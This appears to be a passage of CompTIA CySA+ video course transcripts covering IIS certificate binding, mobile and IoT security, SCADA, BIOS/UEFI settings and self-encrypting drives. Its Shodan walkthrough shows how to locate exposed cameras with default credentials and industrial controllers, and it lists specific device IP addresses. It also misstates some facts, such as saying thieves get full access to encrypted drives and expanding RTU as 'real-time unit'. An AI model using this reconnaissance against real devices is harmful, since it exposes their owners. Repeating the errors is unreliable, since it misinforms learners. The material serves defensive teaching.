So that's HTTP and that's fine. However, I'm going to click Add, I want to add https, and I've got to specify the
host name.
[Video description begins] He clicks a drop-down list box labeled "Type" and a drop-down list opens, which
includes an option labeled "https". He then selects the option. [Video description ends]
And I also have to choose a certificate and there's the certificate that we were just looking at.
[Video description begins] He clicks a drop-down list box labeled "SSL certificate" and a drop-down list
opens, which includes an option labeled "EC2AMAZ-E5M0CTT.Domain1.Local". He then selects the
option. [Video description ends]
And if we view the certificate, we can see it was issued by CA1 and so on.
[Video description begins] He clicks a button labeled "View" and its corresponding dialog box opens. [Video
description ends]
[Video description begins] He points to the text, "CA1" adjacent to a field called “Issued by” and then points
to the text, "EC2AMAZ-E5M0CTT.Domain1.Local" adjacent to a field called "Issued to". [Video description
ends]
So at this point, I'm going to leave it on All Unassigned IP addresses, Port 443 is what we want. So that's a
good thing.
[Video description begins] The Add Site Binding dialog box closes. [Video description ends]
I'm going to go ahead and click OK. We now have a binding on 443.
[Video description begins] He clicks a button called "Close" and the Site Bindings dialog box closes. [Video
description ends]
And that should be it. So let's go back into our web browser, where we were testing https connectivity to that
web server. Now this time it's working.
[Video description begins] He enters the URL "https://localhost/". [Video description ends]
It's saying this site is not secure because that is a certificate issued from a private CA, an internal certificate
authority.
[Video description begins] A dialog box labeled "Internet Options" opens. [Video description ends]
If I were to go to ALT+T for Tools and go into Internet Options here in my browser.
[Video description begins] He clicks a button called “Certificates” and a dialog box labeled "Certificates"
opens. In the dialog box, a tab labeled "Personal" is open. [Video description ends]
If I were to go under Content and if I were to take a look at Certificates, we can see trusted root certificates.
[Video description begins] In the Certificates dialog box, he selects a tab labeled "Trusted Root Certification
Authorities". It contains various certificates. [Video description ends]
These are the certificate authorities that will be trusted. So what we have to make sure is that we've got trust
established for certificates coming from CA1.
[Video description begins] He clicks a button labeled "Close" and the Certificates dialog box closes. [Video
description ends]
And that means that, we would have to make sure that we Import the CA1 trusted root certificate, which has
been done.
[Video description begins] He clicks a button labeled "OK" and the Internet Options dialog box closes. [Video
description ends]
[Video description begins] He switches to the Console1 window in which the Certificates subfolder is
selected. [Video description ends]
We might wonder then, wait a minute, why is it saying the site is not secure?
Well, that's because I'm connecting to localhost, that is not the name in the certificate.
[Video description begins] He points to the text, "EC2AMAZ-E5M0CTT.Domain1.Local" adjacent to the field
called "Issued to". [Video description ends]
The name in the certificate is this long example of a name for the server.
[Video description begins] In the dialog box, he selects a tab labeled "Details". It includes a table with several
rows and two column headers. It also includes a text box. [Video description ends]
[Video description begins] He selects the row with row entries labeled "Subject" and "EC2AMAZ-
E5M0CTT.Domain1.Local". The text, "CN = EC2AMAZ-E5M0CTT.Domain1.Local" is displayed in the text
box. [Video description ends]
So what I'm going to do is just highlight that, so the actual DNS name the certificate was issued to.
[Video description begins] He clicks a button labeled "OK" and the dialog box closes. [Video description
ends]
We're going to go back into our browser, and we're going to test https connectivity to it.
So you need to make sure that that name will be resolved to the correct IP, it is, and notice we get a seamless
https connection now to the web site.
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined the use of cryptographic solutions, such as Public Key Infrastructure, PKI,
which deals with encryption and hashing, to secure IT systems and data. We did this by exploring the
components of a PKI hierarchy and how cryptography protects sensitive data. We looked at how to protect
data at rest using EFS, BitLocker encryption and Linux Filesystem encryption. We looked at how to configure
custom encryption keys for cloud storage.
The importance of hashing and how to generate file hashes on Windows and Linux file systems, including how
to download and verify a checksum hash for a Kali Linux download. We took a look at the steps in the PKI
certificate life cycle and how SSL and TLS are used for securing network traffic. We talked about certificate
authorities, including cloud and on-premises CA deployment and PKI certificate issuance. And finally, we
looked at how to configure a Microsoft IIS web site with a PKI certificate. In our next course, we'll move on to
explore how to secure hardware through firmware updates and device configuration on isolated networks. And
we'll also examine SCADA and IOT.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills, to perform data
analysis to identify vulnerabilities, threats, and risks to an organization. To configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore security as it relates to hardware, including applying firmware updates,
configuring devices on isolated networks, as well as taking a look at SCADA and IoT. I'll start by examining
how to address both mobile device and IoT weaknesses. And we'll show you how to use the shodan.io web site
to examine a list of vulnerable devices. I'll then explore how to physically secure facilities and computing
equipment, how vehicles and drones can present security risks, and how SCADA is used for industrial device
networks. Next, I'll examine the BIOS and UEFI security settings and how self-encrypting drives, SEDs,
provide protection for data at rest. Lastly, I'll explore how hardware security modules or HSMs are used for
encryption offloading and the storage of cryptographic secrets.
[Video description begins] Topic title: Mobile Device Security. The presenter is Dan Lachance. [Video
description ends]
Today's proliferation of mobile device usage in the enterprise adds a lot more work to the standard IT
technician in the enterprise. Because it's another class of devices that are widely used that now need to be
secured and supported. We're talking about things like tablets, smartwatches, smartphones, laptops, e-reader
devices. Just a name a few of the many different types of mobile devices widely in use.
[Video description begins] Subscriber Identity Module (SIM) Cards. [Video description ends]
The SIM card, which stands for Subscriber Identity Module card applies to GSM phones. There are different
types of phones, but the GSM phone uses a SIM card and the SIM card provides access to a carrier network.
You can also enable SIM card locking. This means that if you were to take the SIM card out of that device, out
of that phone and plug it into another phone. You would then be presented with the option of having to put in
the PIN. Well actually, it's not an option. It's mandatory if you've enabled SIM card lock. Now bear in mind,
on your SIM card, there might be some other items that are stored besides your subscriber information for your
chosen carrier. You might have some SMS text messages, some contact lists, and so on. Now SIM cards make
it easy to switch phones because the true identity of the phone that connects it to a carrier network is stored on
the card. As supposed to in the phone itself.
Now there are many potential threats with mobile devices such as malicious app store apps that people might
download and run on their phones. There's using default settings for phones, not having a strong password or a
more difficult PIN to figure out to unlock the phone. The lack of device encryption, the lack of enabling SIM
card lock, or having Wi-Fi and Bluetooth enabled when they're not even needed on the device. Geotagging, a
geotagging stores the longitude and latitude coordinates, which could present a personal security risk. There's
also in some cases with some types of mobile devices like e-readers, limited update capabilities. If a mobile
device is lost or stolen, which can happen easily because they're very small. Then we want to make sure that
we've at least enabled encryption.
And even still, if someone has physical access to a device, they can do a lot to it to potentially retrieve data on
it. We want to make sure that screen lockout is timed appropriately, so it's rather frequent. We also want to
make sure that if micro SD cards are being used, that they're encrypted, minimize the use of public Wi-Fi
connectivity. Every mobile device where possible should also have a firewall configured appropriately and an
antivirus app. And then of course, there's the threat of BYOD, bring your own device. This means that users
are putting on the network a mobile device that is theirs personally. It might be used for business, but it's also
got some personal use which could lead to some risky behavior. Such as downloading apps from an app store
that could infect the phone and in turn, infect the network the phone is connected to, it's possible.
[Video description begins] Mobile Device Threat Mitigation. [Video description ends]
What can we do to mitigate some of these mobile device threats? Well the first order of business is to make
sure you have a centralized inventory of devices that you can centrally configure and manage. That happens
with a mobile device management or MDM tool. So centralized policy-based configuration of mobile devices
like smartphones and tablets. You can also configure a security config baseline for a specific mobile operating
system platform. So that devices can be brought into compliance if they are not in line with the standard
security configuration baseline. You can also, for BYOD, create a corporate partition. Essentially, you can
have corporate personal apps, corporate personal settings, and corporate and personal data partitions through
partitioning. That would facilitate remote wiping for a technician in the enterprise. If a phone is lost, then he or
she could issue a remote wipe command to wipe the corporate partition, not necessarily the personal one.
After completing this video, you will be able to recognize how to address IoT device weaknesses.
Objectives
[Video description begins] Topic title: IoT Security. The presenter is Dan Lachance. [Video description ends]
Internet of Things or IoT refers to consumer grade items that might be used either personally or in some cases
in industry.
Where those devices have the ability to communicate over the Internet. This would include devices related to
home automation, baby monitors, video surveillance systems, fitness trackers, smart speakers, smart TVs. And
many, many other types of items. So the problem is that many IoT devices have very little security built in. In
some cases, none, to the point where there might even be hard-coded usernames and passwords that cannot be
changed. And no firmware updates available to mitigate those issues.
[Video description begins] Internet of Things (IoT) Search Engine. [Video description ends]
This is a search engine which allows you to search for vulnerable Internet of Things or IoT devices. And it's
amazing how easy it is to find these things. Here for example, we can see highlighted a Directory Traversal
vulnerability in a specific type of device. Now, most IoT devices have a web interface that you can connect to.
Most of them are vulnerable to some kind of a web application attack. Directory Traversal means that an
attacker could go through the file system structure within that web application. And potentially gain access to
files that he or she should not have access to.
The Mirai Botnet is a great example of the lack of security with IoT devices. The Mirai Botnet is a collection
of IoT devices that are under hacker control. For example, some of them could be infected with malware at
which point the hacker has the ability to control this collection of zombies or bots. That the botnet is collection
of them, the attacker has the ability to control them. And those IoT devices then might be used to initiate
distributed denial-of-service or DDoS attacks. And on the dark net, or dark web, same thing. The rental of
botnets for this purpose is actually available. So what can we do about this? Well, there are a lot of IoT device
flaws.
The idea being that security simply is not a priority with them, especially with consumer grade products, less
so with enterprise grade products. There are many unchangeable default settings. The inability in some cases to
apply firmware updates. And so what can we do? Well, limited items, limited choices here. But one thing is
network isolation. So what we could do is place some of these insecure IoT devices on their own network
segments. So if they do get compromised. They're on a network that isn't connected to other devices that might
contain sensitive information like database servers. We could also enable a guest Wi-Fi network separate from
perhaps a more secured Wi-Fi network used by trusted devices that are secure. And where possible, we should
go into the configuration of IoT devices and disable unused features that might present security risks. Such as
universal plug and play is one example.
In this video, learn how to access and navigate the Shodan website.
Objectives
The shodan.io web site is a great resource when you want to check out listings of vulnerable devices, primarily
IoT devices.
[Video description begins] A web site labeled "SHODAN" opens in the web browser. It is divided into two
parts. The first part is a menu bar. It includes options labeled "Explore" and "Downloads". The second part is
a content pane. [Video description ends]
Not because you're interested in exploiting any of those vulnerabilities, but just to get a sense of how important
it is to change default settings, isolate vulnerable IoT devices on their own networks, and so on.
[Video description begins] He points to the URL labeled "shodan.io". [Video description ends]
In some cases, you might even want to make sure you air gap some of your networks so they actually have no
connection at all to the Internet. So the first thing, I'm going to do here on the shodan.io web site is, I'll click
Explore up at the top.
[Video description begins] He clicks the "Explore" option. A page labeled "Explore" opens in the content
pane. It is divided into three sections labeled "Featured Categories", "Top Voted", and "Recently Shared". The
"Top Voted" section includes tiles labeled "Webcam" and "Cams". [Video description ends]
And here I've got a number of different categories for different types of devices, including webcams. So, I'm
going to click on Webcam.
[Video description begins] He clicks the "Webcam" tile and the corresponding page opens. It includes a
section labeled "RELATED TAGS:", which further includes tabs labeled "webcam" and "cams". [Video
description ends]
[Video description begins] He clicks the "webcam" tab. A page labeled "Explore Tag: webcam" opens in the
content pane. It includes several tiles labeled "MayGion IP cameras (admin:admin)" and "webcam no
pass". [Video description ends]
And maybe I'll click on this first listing here for MayGion IP cameras.
[Video description begins] He clicks the "MayGion IP cameras (admin:admin)" tile and the corresponding
page opens in the content pane. It is divided into two parts. The first part includes the options labeled "Maps"
and "Explore". The second part includes the information about the login details of the vulnerable devices at
the different parts of the world. [Video description ends]
Now in this listing, what we're seeing are, what are potentially vulnerable devices. That normally results from
people purchasing consumer-grade IoT devices, and just plugging them in and forgetting them. It's convenient
to stick with the defaults. But we know from a security perspective, that is an absolute no no. So as we go
down, for example, we can see the specific details about hosts like IP addresses of potentially vulnerable
devices.
[Video description begins] He highlights the following text "HTTP/1.1 200 OK". [Video description ends]
There's a web server built into most firmware for IoT devices that allows administration and management of
that device. And we can actually click the link to follow that connection to the point where if we're going to be
prompted to Login, we're going to get this kind of screen.
[Video description begins] He clicks the link icon corresponding to "Login" and a web page labeled
"KOYZINA" opens in the web browser. It contains a dialog box labeled "Login". It includes text boxes labeled
"User" and "Password". [Video description ends]
Now of course, what a malicious user would normally do is research that device make and model, and take a
look at the default credentials that are normally shipped with that type of device. Now we're not going to go
down that road, because at that point you're getting into illegal territory. And we don't want to get into that. All
we're doing is trying to identify how incredibly vulnerable many devices are when you just plug them into the
network and do not change the default settings. I'm going to close that out. We are not going down that road.
[Video description begins] He closes the "KOYZINA" web page and returns back to the previous page. [Video
description ends]
[Video description begins] He clicks the "Maps" option and the map of the world opens. It is divided into two
parts. The first part includes options labeled "Shodan" and "Monitor". The second part includes a search bar
and four sections labeled "Total Results:", "Top Services", "Top Countries", and "Top Organizations". [Video
description ends]
Now if you haven't signed in already on the Shodan web site, you don't have to create an account specifically.
You can sign in using your Google ID or Facebook, and so on. So here we have a map of the world. Okay, so
what can we do with this? Well, we can start searching for items. For example, let's say I'm interested in seeing
dlink vulnerable devices.
[Video description begins] He types the text "dlink" in the search bar and the processing starts. [Video
description ends]
So I can search for dlink, and then I can start zooming in to different parts of the world. So for example, let's
go here to the East Coast of Canada. And it looks like we've got a couple of dlink items showing up on the map
already.
[Video description begins] He clicks the dlink item on the map. A dialog box labeled "24.137.110.88" opens. It
includes a button labeled "View Details", a hyperlink labeled "host-24-137-110-88.public.eastlink.ca", and
ports labeled "23", "80", "161", and "443". [Video description ends]
Okay, so if I were to actually point and click on it, I get details about that specific dlink device that potentially
is vulnerable. I can see the IP address.
[Video description begins] He clicks the "View Details" button and a web page labeled "24.137.110.88" opens
in the web browser. It includes the sections labeled "Ports" and "Services". [Video description ends]
And if I click View Details, then we can see even more information as we scroll down about that. So this
would be, again, another way that we might identify any potentially vulnerable devices. It just doesn't end.
[Video description begins] He closes the "24.137.110.88" web page and returns back to the previous
page. [Video description ends]
[Video description begins] He closes the "24.137.110.88" dialog box. [Video description ends]
So the next thing I'm going to do is, go back to the main Shodan web site.
[Video description begins] He clicks the "Shodan" option and the "SHODAN" web page opens in the web
browser. [Video description ends]
And the next thing I want to do after that is, start looking at industrial control systems. So I'm going to click
Explore.
[Video description begins] He clicks the "Explore" option and the "Explore" page opens in the content
pane. [Video description ends]
And I'll click Industrial Control Systems, which is used to control everything from manufacturing oil
refineries, water systems, the electricity grid, all that type of stuff.
[Video description begins] He clicks the button labeled "Industrial Control Systems" under the "Featured
Categories" section. A page labeled "Industrial Control Systems" opens in the content pane. It includes a
section labeled "Protocols", which further includes several protocols subsections labeled "SIEMENS" and
"dnp". [Video description ends]
And as we scroll down, we can choose the specific type of device or PLCs that we're interested in. Let's say,
I'm interested in SIEMENS S7 PLCs, programmable logic controllers.
[Video description begins] He points to the "SIEMENS" protocol subsection. It includes a button labeled
"Explore Siemens S7". [Video description ends]
And now once again, we're starting to get a list of devices in different parts of the world.
[Video description begins] He clicks the "Explore Siemens S7" button and the corresponding page opens in
the content pane. It is divided into two parts. The first part includes the options labeled "Maps" and "Explore".
The second part includes the information about the devices at the different parts of the world. [Video
description ends]
Of course, we could always click on Maps to start viewing it from that perspective again. And we could start
drilling down and seeing where we might have some vulnerable devices.
[Video description begins] He clicks the "Maps" option and the map of the world opens. [Video description
ends]
[Video description begins] He zooms in to the world map and points to the dlink item on the city labeled
"Montreal". [Video description ends]
But we can start learning about details of these things, and determining whether or not that is a device that
potentially could be open or not.
[Video description begins] He clicks the dlink item and a dialog box labeled "142.44.189.171" opens. It
includes a button labeled "View Details". [Video description ends]
Now as good guys and good girls, so to speak, we aren't going to exploit anything we discover.
[Video description begins] He clicks the "View Details" button and a web page labeled "142.44.189.171"
opens in the web browser. It includes sections labeled "Ports" and "Services". [Video description ends]
But this is just to demonstrate how easy it is for malicious users to pinpoint where potentially vulnerable
devices might exist on the Internet.
After completing this video, you will be able to list how to physically secure facilities and computing
equipment.
Objectives
[Video description begins] Topic title: Physical Security. The presenter is Dan Lachance. [Video description
ends]
Despite all of our technological security solutions, physical security still plays a very large part in securing
digital assets. Now this is a crucial part of risk assessment. Things like locked buildings, locked doors and
windows, or limited access to different floors in a building, security guards having to check in with a sign in
log when you physically present yourself to a facility. All of this is very important in physical security. Now
the other thing to bear in mind is that we need to have a centralized inventory of physical devices related to
assets. Things like important servers, and of course, the storage arrays that hold the sensitive data that results
from the use of those crucial servers. We need to know the physical location of devices. And we should have
preventative measures put in place.
In other words, security controls, such as lock-down cables for laptop computers, or making sure that server
room doors are always locked and a very limited number of people have access to either a physical key, or the
keypad combination to open the server room door. There's also locked server room racks. So just because
someone has access to a server room shouldn't mean they have access to everything in it, like storage arrays
and servers and KVM switches. So we want to make sure that equipment racks are locked appropriately. On
the physical security side, we have to think about how it relates to the digital world.
One example might be to require client device PKI certificates before allowing physical network access, in
other words, network access control. If a device can somehow get on a network, whether it's wired or wireless,
that's one less thing the attacker has to figure out before they can start conducting a variety of types of attacks
including reconnaissance. Even attacks like ARP cache poisoning requires network access. We want to make
sure that we encrypt data at rest, in case, storage device is physically stolen. If a storage device is physically
stolen and encryption is in place, then the thief has full access to that data. But if it's encrypted, there's a good
chance that they will not be able to decrypt and get to the data on the stolen storage device. And there's also
air-gapping networks. An air-gapped network is one that actually isn't physically connected to an otherwise
public network. Maybe one that is reachable from the internet, and perhaps certainly not plugged in or
connected to a network that might be available through a Wi-Fi router.
Upon completion of this video, you will be able to describe how vehicles such as drones can present security
risks.
Objectives
[Video description begins] Topic title: Drones and Vehicles. The presenter is Dan Lachance. [Video
description ends]
We know that mobile devices like smartphones can present unique security threats to an enterprise
environment.
[Video description begins] Drones and Proximity Security. [Video description ends]
But what about drones? And what about cars? Let's talk about drones first and proximity security. A drone is a
mobile airborne device. And it can be used for many purposes, including, on the security side, reconnaissance
to learn about a property or in the military sense an enemy. Or in law enforcement, about a perpetrator of a
crime. Drones and proximity security begin with regulations. In different parts of the world, drones are
considered to be just regular aircraft. And as a result, you need to acquire a drone pilot certificate. The drone
itself needs to be registered with a central registry. And there might be limitations, such as not allowing flying
the drone below a certain height, 122 meters, 400 feet or not allowing it to be flown above that height in
certain restricted airspace areas. So normally, drones are not allowed in airports or where there might be any
other aircraft in their flight paths.
Then, there is also the issue of privacy and voyeurism, where drone could be used to take video, for example,
of someone on their private property, taken from the air. Now, there's this concept of war flying. This is similar
to a Wi-Fi network. And this is essentially called war driving, where one would drive around with a device
with a high gain Wi-Fi antenna to discover wireless networks, such as to discover open wireless networks.
Well, war flying is similar but from a drone. So a drone might be used, for instance, to discover open Wi-Fi
networks. Because it will be equipped with Wi-Fi scanning equipment. Of course, a drone can also be
weaponized and used by the military or by law enforcement such as for dropping bombs or sending missiles.
The other thing to consider is geo-fencing. The firmware in a drone has geo-fencing software. Now, what this
really means is that it honors no-fly zones, such as airports. And it's based on GPS satellite positioning. So it
can determine the longitude and latitude coordinates of the drone itself to ensure it's not in a no-fly zone.
However, there are some articles on the Internet discussing how to disable the geo-fencing capabilities of
drones in order to circumvent no-fly zones.
Then there's vehicles. Vehicles have internal networks. The one that controls the crucial functionality of a
vehicle is called a Controller Area Network or a CAN bus. It's a bus network that is compliant with ISO
11989-1. It's a serial communication type of network that's used to communicate with electronic control units,
or ECUs, that control various aspects of the vehicle. Things like engine start and stop, collision avoidance,
parking assistance, and many other functionalities. There's also another network in a vehicle that's less critical
called a Local Interconnect Network or LIN. So this is a serial network as well, but again, for non-critical
vehicle functions. It uses master and slave controllers or firmware where each controller has a 7-bit unique
address that map's to OSI layer 2, the data link layer hardware addresses. And it uses broadcast transmissions
to get things done around the LIN.
Pictured on the screen we have a diagram of a vehicles CAN bus. Where notice on both ends, we've got
between a 110 and 120 ohm terminating resistor for signal absorption. We've got four ECUs, electronic control
units, listed here. The engine controller, the ABS controller, a chassis controller for the vehicle, an anti-theft
controller. But the reality is that the CAN bus these days in modern vehicles, depending on the vehicle model,
will contain dozens of these ECUs. We're only showing four here. But they are interconnected on the CAN bus
through twisted pair copper wires.
Now, what this means then is that all of the nodes can transmit or receive at any time. There's no notion, as
there is on a LIN, of master/slave. It's multi-master on the CAN bus. And whenever a signal is transmitted to
an ECU, like the engine controller, that firmware computes a CRC, a cyclic redundancy check, to ensure that
what it's received is what it was sent. Nothing's been lost in the transmission. And if there's no
acknowledgement from the sending firmware, then it will simply retransmit. Now, there's also a diagnostics
gateway that allows car service technicians to check on each of these ECUs.
And also to apply updates to the firmware. With modern cars, you can also download updates from the
manufacturer's web site, and put it on a USB thumb drive that you plug into your car to update it as well. That's
even possible. So the takeaway here is that modern vehicles, drones and cars and trucks, these have a lot of
electronics built in and a lot of network capabilities. Vehicles these days can even, on a subscription basis,
connect to a cell phone network. So that you can have an app on your phone to track the location of your car.
Maybe to check on where it's travelling to, what the current odometer and fuel readings are, and so on. As a
result, there's a potential for malicious attacks because of that type of connectivity.
Upon completion of this video, you will be able to recognize how SCADA is used for industrial device
networks.
Objectives
[Video description begins] Topic title: SCADA. The presenter is Dan Lachance. [Video description ends]
[Video description begins] Supervisory Control and Data Acquisition (SCADA). [Video description ends]
Now, this is used to control industrial processes such as with manufacturing or critical infrastructure like
water, electricity, oil refineries. So it consists of both hardware and software to make all of this happen. There
are control stations, intermediaries, and the devices that actually perform the work, often mechanical robotic
devices.
So here we have a diagram of how SCADA all works together. First, at the bottom, we've got a Controller
Area Network or a CAN, otherwise sometimes called a Distributed Control System or DCS. In the middle,
we've got programmable logic controllers, or PLCs. Now, PLCs are used in industrial network environments.
They can execute instructions on industrial devices, which we see on the left of our diagram. Such as on
factory assembly lines, they can control and take readings from pumps, valves, and sensors. And they can be
used within electricity substations for those purposes, to gain telemetry data or to send instructions to
components. Now, PLCs can also talk to industrial devices and relay their telemetry data to a SCADA system.
So on the right, we see SCADA software.
[Video description begins] Common SCADA Transmission Protocol. [Video description ends]
Now, there are a couple of different types of transmission protocols that could be used with SCADA, one of
which is DN3P. This is something that you'll see as a transmission protocol used in North America with water
and electric companies. In Europe, the equivalent is the T101 protocol.
[Video description begins] PLC/RTU Operating Systems. [Video description ends]
Then we've got PLCs and RTU operating systems. Now, the RTU is a real-time unit, similar to a PLC.
[Video description begins] Real-time operating system abbreviates to RTO. [Video description ends]
They have a real-time operating system such as VxWorks, or Schneider-based OS, or Quantum-based OS. Or
even Microware OS-9, which is used for Allen-Bradley PLCs.
So what can we do to secure an industrial SCADA network environment? Well, we want to make sure that
PLCs or RTUs are configured in such a way. Such as defaults are not used and unnecessary components are
disabled. And that they are patched, whether we're using OS-9 or VxWorks, and so on. The other thing to
consider, especially when it comes to SCADA control of devices in a military environment. Would be to think
about the device supply chain. Who made the components, such as specific firmware chips embedded in
devices and are they trustworthy?
Then we should consider banning the use of USB thumb drives. There have been known attacks against certain
models of PLCs in the past. That have been propagated by unsuspecting people plugging in USB thumb drives
on a network. Thus, unleashing a worm that can infect other devices on the network or even seeking out certain
models of PLCs. The other thing is to always keep details hidden. Never disclose hardware and software
names and versions in use in an industrial environment. And if you're using operating systems such as
VxWorks, then harden them specifically for any weaknesses they might present. Such as blocking UDP port
17185, which is used in VxWorks for the debugger.
After completing this video, you will be able to recognize BIOS and UEFI security settings.
Objectives
[Video description begins] Topic title: BIOS and UEFI. The presenter is Dan Lachance. [Video description
ends]
BIOS and UEFI include the firmware instructions that kick in when a machine starts up.
[Video description begins] A web page labeled "BIOS Simulator Center" opens in a web browser. It contains a
sample simulator labeled "Lenovo BIOS Setup Utility". It is divided into two parts. The first part is a menu
bar. It includes the options labeled "Security", "Startup", and "Main". The second part is a content
pane. [Video description ends]
Now here we have a sample simulator for a Lenovo BIOS Setup Utility. And this is an important part of
security. One of the things that we might consider when it comes to BIOS or UEFI security is things like
startup passwords. Whether hardware-enabled encryption through TPM, or Trusted Platform Module is
enabled and so on. So let's take a look at some of the things that are worth considering when it comes to
configuring the BIOS or the UEFI on enterprise devices. Now, if we go to the Security tab up here in the
menu.
[Video description begins] He switches to the "Security" option and the corresponding page opens in the
content pane. It includes the fields labeled "Administrator Password" and "Power-On Password" with the
corresponding values labeled "[Not Installed]", the fields labeled "Set Administrator Password" and "Set
Power-On Password" with the corresponding values labeled "[Enter]", and the fields labeled "Windows UEFI
Firmware Update", "Require POP on System Boot", and "Require POP on Restart" with the corresponding
values labeled "[Enabled]", "[Yes]", and "[No]" respectively. [Video description ends]
And you'll normally get to the BIOS or UEFI utility by pressing a certain key when the machine is first booting
up. But when we go into the security settings. One of the first things I notice here is that there is not an
Administrator Password or a Power-On Password.
[Video description begins] He highlights the "Set Administrator Password" field and its corresponding value
"[Enter]". [Video description ends]
We know that because up above, in gray, it say Not Installed for both of those entries.
[Video description begins] He points to the "Administrator Password", "Power-On Password" fields, and their
corresponding values. [Video description ends]
Now the Administrator Password would be required when you want to come into this utility to make changes.
The Power-On Password or POP, as you might gather is required every time the machine is powered on. So
these are great little security mechanisms that we should set.
[Video description begins] He clicks the "Set Administrator Password" field and a pop-up box labeled "Set
Administrator Password" opens. It includes the fields labeled "Enter New Password", "Confirm New
Password", "[Yes]", and "[No]". The "[Yes]" field is already selected. [Video description ends]
Now when we press Enter on these, we would enter and confirm both the administrator and the Power-On
Password, the POP.
[Video description begins] He clicks the Enter and the "Set Administrator Password" pop-up box
closes. [Video description ends]
The other thing is making sure that the firmware instructions are updated when requiredon all devices.
[Video description begins] He highlights the “Windows UEFI Firmware Update” field and its corresponding
value "[Enabled]". [Video description ends]
This means you have to have an inventory of what's out on your network, so you know what versions of
firmware are there. Then from that point you can determine if they need to be updated. Now often when you
go to the Main part of the BIOS utility, which I've done here at the top in the menu. We'll be able to see any
details related to the revision level and the date.
[Video description begins] He clicks the "Main" option and the corresponding page opens in the content pane.
It includes the fields labeled "BIOS Revision Level", "Boot Block Revision Level", and "BIOS Date
(MM/DD/YYYY)" with the corresponding values labeled "O2HKT", "1.x", and "xx/xx/xxx" respectively. [Video
description ends]
This way we can determine if there's a newer version that we should apply that might either enhance features,
remove bugs, or close security holes. Let's go back to Security though for a second.
[Video description begins] He switches back to the "Security" option and the corresponding page opens. It
includes the options labeled "TCG Feature Setup" and "Secure Boot". [Video description ends]
The other thing is, do we require a POP, that's a Power-On Password when the system is simply booted or
restarted?
[Video description begins] He highlights the "Require POP on System Boot" field with a corresponding value
"[Yes]". [Video description ends]
[Video description begins] He highlights the "Require POP on Restart" field with a corresponding value
"[No]". [Video description ends]
Then we have the option of TCG. Do we want to enable Firmware TPM, Trusted Platform Module?
[Video description begins] He clicks the "TCG Feature Setup" option and a page labeled "TCG Feature
Setup" opens. It includes the fields labeled "TCG Security Device" and "Security Chip 2.0" with the
corresponding values labeled "Firmware TPM" and "[Enabled]" respectively. The "TCG Security Device"
field with corresponding value "Firmware TPM" is already highlighted. [Video description ends]
TPM has the ability to store cryptographic keys on this device. So on a laptop, let's say, running Windows 10,
you might want to enable BitLocker, if your edition of Windows 10 supports that. So that you can encrypt disk
volume, so they're protected when the machine's powered off. And that can be tied in with the firmware TPM.
So that if the machine is stolen and the drive is ripped out and plugged into another station. The keys aren't
even available because it's a different TPM and a different machine. So we've got a number of options
available there.
[Video description begins] He switches back to the previous page. [Video description ends]
We've also got the Secure Boot option, which is currently set to Disabled.
[Video description begins] He clicks the "Secure Boot" option and a page labeled "Secure Boot" opens. It
includes a table. The table contains four rows and two columns. The column headers labeled "Secure Boot
Status" and "User Mode". The table includes the row entries labeled "Secure Boot" and "[Disabled]" under
the column headers "Secure Boot Status" and "User Mode" respectively. [Video description ends]
Secure Boot, when it's Enabled, is used to determine if there have been any start-up changes to the operating
system bootloader. It prevents malware from kicking in as the machine is starting up.
[Video description begins] He clicks the row entry "[Disabled]". A pop-up box opens, which contains two
options "Disabled" and "Enabled". [Video description ends]
So we have the option of enabling secure boot as well. So there are a number of these items then that we
should consider at the security level for hardware devices. Now even, it doesn't have to just be a physical
server where we deem it being important enough to configure this. Even on every user laptop and desktop, this
is something that we might consider from a hardening perspective.
Upon completion of this video, you will be able to recognize how SEDs provide protection for data at rest.
Objectives
[Video description begins] Topic title: Self Encrypting Drives. The presenter is Dan Lachance. [Video
description ends]
One way to protect data at rest is to use Self Encrypting Drives or SEDs.
[Video description begins] Self Encrypting Drives (SEDs). [Video description ends]
This provides protection at the hardware level for the data stored on a drive, if the drive or the device housing
the drive is lost or stolen. And depending on the configuration of the self encrypting drive, it might not require
any user interaction after it's configured. Now, it would require user interaction, if you're using an
authentication key or an AK. Now an authentication key can be required, the user will be prompted to enter it
when the machine is powered on. Now that's just an additional security measure to unlock or decrypt the drive.
[Video description begins] Authentication key abbreviates to AK. [Video description ends]
Beyond simply possessing the device that houses that encrypted drive. Now in order to use authentication
keys, your motherboard BIOS or UEFI has to support it and has to be enabled for it. So encryption and
decryption then is automatic after the authentication key is supplied.
[Video description begins] Drive is locked when power is removed or drive is moved to another
computer. [Video description ends]
The thing to bear in mind as well is that Self Encrypting Drives also can allow for regulatory compliance
where data at rest needs to be protected.
[Video description begins] Self Encrypting Drives. [Video description ends]
Such as with FIPS 1402 compliance. Now, this means that it's certified by the National Institute of Standards
and Technology in the United States. As being a secure device using cryptographic modules to protect
information securely. Self encrypting drives also support crypto-shredding otherwise called cryptographic
erase. What does this mean? Well what it means is that, if you destroy the cryptographic keys that are used to
protect the drive, then the loss of the keys means that you can't get to the data, hence, it's irretrievable or you
could say, in a sense, it's deleted.
[Video description begins] Self Encrypting Drives Security Issues. [Video description ends]
Now what are some security issues we should be aware of regarding Self Encrypting Drives? Well, the whole
idea is that you need to be in the habit of powering off your machine when not in use, which is when the drive
is locked and encrypted. Because once the machine is powered on and perhaps, you've entered in the
authentication key, it's business as usual. It's as, if nothing is encrypted on the drive while the machine is
running. And so, if the drive is moved to a different machine while power is maintained.
And there are ways that that can actually be done then that could be a security problem. Because the contents
of the drive are readily available. If a malicious user can somehow use a LiveCD to boot up without cutting
power then they potentially could gain access to the contents of the Self Encrypting Drive. And depending on
the configuration of user laptops. If sleep mode kicks in and the machine goes to sleep, yet there's enough
power to retain memory contents. Then the encryption password could be retained in memory. Which means
when you wake up the laptop, you're not prompted for an authentication key or anything like that. So, while
Self Encrypting Drives are very useful, we just need to be aware of some of the limitations.
Upon completion of this video, you will be able to recognize how HSMs are used for encryption offloading
